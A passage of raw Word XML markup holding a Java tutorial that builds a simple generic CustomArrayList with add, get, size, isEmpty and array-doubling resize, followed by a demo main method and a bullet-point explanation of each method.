          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement common ArrayList functionalities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like add(), get(), and size().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165A32CB"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Here’s how you can implement a basic custom ArrayList class that allows specifying the initial capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B4D0C" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Custom ArrayList Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A77AC8"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import java.util.Arrays;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E380C" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68592C0D"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public class CustomArrayList&lt;T&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBED21"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private Object[] elements; // Internal array to store the elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4CEE0"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private int size;         // Number of elements in the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F413095"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private int capacity;     // Current capacity of the internal array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1895D" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272F8855"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 Constructor with custom capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DECA9"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public CustomArrayList(int initialCapacity) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCE9B0"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if (initialCapacity &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5DB3B2"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throw new IllegalArgumentException("Capacity cannot be negative");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C37454"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60528AFD"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this.capacity = initialCapacity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AAE8E5"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this.elements = new Object[capacity]; // Create an array with the initial capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB582FE"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this.size = 0; // Initially, the size is 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F1009"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6E0DF" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AD75F2"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 Add an element to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92A1D4"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public void add(T element) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657157C"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 Check if the internal array is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E01D39"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if (size == capacity) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CDF21D"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resize(); // Resize the array when it's full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE3DA5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671FA720"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elements[size++] = element; // Add the element and increment the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B5BB4"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD9E380" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F9A0E8"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 Resize the internal array when it's full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EC46A"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private void resize() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1F213"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 Double the capacity when resizing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77107507"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capacity = capacity * 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D667B3D"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elements = Arrays.copyOf(elements, capacity); // Copy elements to a new array with doubled capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92B58A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B5BED" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68128968"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 Get an element by index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E53B8"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public T get(int index) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E73C3"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if (index &gt;= size || index &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBE957"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throw new IndexOutOfBoundsException("Index out of bounds");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF37EDA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31565FA4"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return (T) elements[index]; // Return the element at the specified index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FE686"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B9B9D" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636DB651"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 Get the current size of the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F82AEE"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public int size() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593965A"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return size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB9C6B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AC754E" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371CDDA6"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 Check if the list is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FF19C"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public boolean isEmpty() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694D261"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return size == 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16578B83"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FE3E0" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2625E690"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 Print all elements (for testing purposes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170AE227"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public void printList() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792C2B8"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for (int i = 0; i &lt; size; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444CA6F"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System.out.print(elements[i] + " ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E16EA01"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201BEE93"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System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C3872"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E4C5A" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3933D17E"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F89C7A"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 Create a CustomArrayList with an initial capacity of 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397B5A8"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CustomArrayList&lt;Integer&gt; list = new CustomArrayList&lt;&gt;(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20D6DB" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDF6DD2"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 Add elements to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284D818"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list.add(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D630383"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list.add(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A768D"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list.add(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF307BE"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list.add(4); // This will trigger resizing since initial capacity is 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027CDC11" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B133C10"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 Print the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3FB04"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list.printList(); // Output: 1 2 3 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F1CB0B" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0746A1"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 Get the element at index 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D5BF7"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System.out.println("Element at index 2: " + list.get(2)); // Output: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2DE587" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04CB3ADF"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 Get the size of the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E33CA"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System.out.println("Size of the list: " + list.size()); // Output: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67357764"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09321B36"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624A9EF6" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation of the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C133FC" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="000B4CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Internal Array (elements)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The elements array holds the actual data of the custom ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4249D" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="000B4CE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initial Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The constructor allows you to specify the initial capacity of the ArrayList. It checks if the capacity is non-negative and initializes the elements array accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D5B41" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>add(T element) Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21127347" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Adds elements to the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD3A25" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If the ArrayList is full (i.e., when size == capacity), it triggers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by calling the resize() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510C75A2" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resize() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660999AC" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This method is called whenever the internal array is full, and it doubles the capacity of the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195942D0" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The method uses Arrays.copyOf() to create a new array with double the current capacity and copies the existing elements to the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064EB8C" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>get(int index) Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD265D" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Retrieves an element at a specified index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA582B8" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It throws an IndexOutOfBoundsException if the index is invalid (i.e., negative or greater than the current size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94AAE0" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>size() Method</w:t>
      </w:r>
